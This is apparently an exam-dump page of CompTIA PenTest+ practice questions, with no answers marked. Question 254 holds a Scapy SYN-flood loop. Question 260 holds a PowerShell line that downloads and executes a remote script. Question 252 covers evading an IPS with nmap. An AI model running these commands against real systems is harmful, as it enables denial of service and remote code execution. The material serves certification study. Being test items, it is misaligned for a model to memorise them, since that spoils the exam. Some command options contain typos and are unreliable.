PT0-003 Exam Details

  • Exam Code
    :PT0-003
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :404 Q&As
  • Last Updated
    :Jun 09, 2026

CompTIA PT0-003 Online Questions & Answers

  • Question 251:

    A compliance-based penetration test is primarily concerned with:

    A. obtaining Pll from the protected network.
    B. bypassing protection on edge devices.
    C. determining the efficacy of a specific set of security standards.
    D. obtaining specific information from the protected network.

  • Question 252:

    A security engineer is trying to bypass a network IPS that isolates the source when the scan exceeds 100 packets per minute. The scope of the scan is to identify web servers in the 10.0.0.0/16 subnet.

    Which of the following commands should the engineer use to achieve the objective in the least amount of time?

    A. nmap -T3 -p 80 10.0.0.0/16 -- max-hostgroup 100
    B. nmap -TO -p 80 10.0.0.0/16
    C. nmap -T4 -p 80 10.0.0.0/16 -- max-rate 60
    D. nmap -T5 -p 80 10.0.0.0/16 -- min-rate 80

  • Question 253:

    DRAG DROP

    Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented Each password may be used only once.

    Select and Place:

  • Question 254:

    A penetration tester is authorized to perform a DoS attack against a host on a network.

    Given the following input:

    ip = IP("192.168.50.2")

    tcp = TCP(sport=RandShort(), dport=80, flags="S") raw = RAW(b"X"*1024) p = ip/tcp/raw send(p, loop=1, verbose=0)

    Which of the following attack types is most likely being used in the test?

    A. MDK4
    B. Smurf attack
    C. FragAttack
    D. SYN flood

  • Question 255:

    During host discovery, a security analyst wants to obtain GeoIP information and a comprehensive summary of exposed services.

    Which of the following tools is best for this task?

    A. WiGLE.net
    B. WHOIS
    C. theHarvester
    D. Censys.io

  • Question 256:

    A penetration tester cannot complete a full vulnerability scan because the client's WAF is blocking communications.

    During which of the following activities should the penetration tester discuss this issue with the client?

    A. Goal reprioritization
    B. Peer review
    C. Client acceptance
    D. Stakeholder alignment

  • Question 257:

    In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company's servers.

    Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?

    A. Test for RFC-defined protocol conformance.
    B. Attempt to brute force authentication to the service.
    C. Perform a reverse DNS query and match to the service banner.
    D. Check for an open relay configuration.

  • Question 258:

    A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client's networking team observes a substantial increase in DNS traffic.

    Which of the following would most likely explain the increase in DNS traffic?

    A. Covert data exfiltration
    B. URL spidering
    C. HTML scrapping
    D. DoS attack

  • Question 259:

    A company that uses an insecure corporate wireless network is concerned about security.

    Which of the following is the most likely tool a penetration tester could use to obtain initial access?

    A. Responder
    B. Metasploit
    C. Netcat
    D. Nmap

  • Question 260:

    Given the following script:

    $1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1]

    If ($1 -eq "administrator") {

    echo IEX(New-Object Net.WebClient).Downloadstring('http://10.10.11.12:8080/ul/windows.ps1') |

    powershell - noprofile -}

    Which of the following is the penetration tester most likely trying to do?

    A. Change the system's wallpaper based on the current user's preferences.
    B. Capture the administrator's password and transmit it to a remote server.
    C. Conditionally stage and execute a remote script.
    D. Log the internet browsing history for a systems administrator.

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-003 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.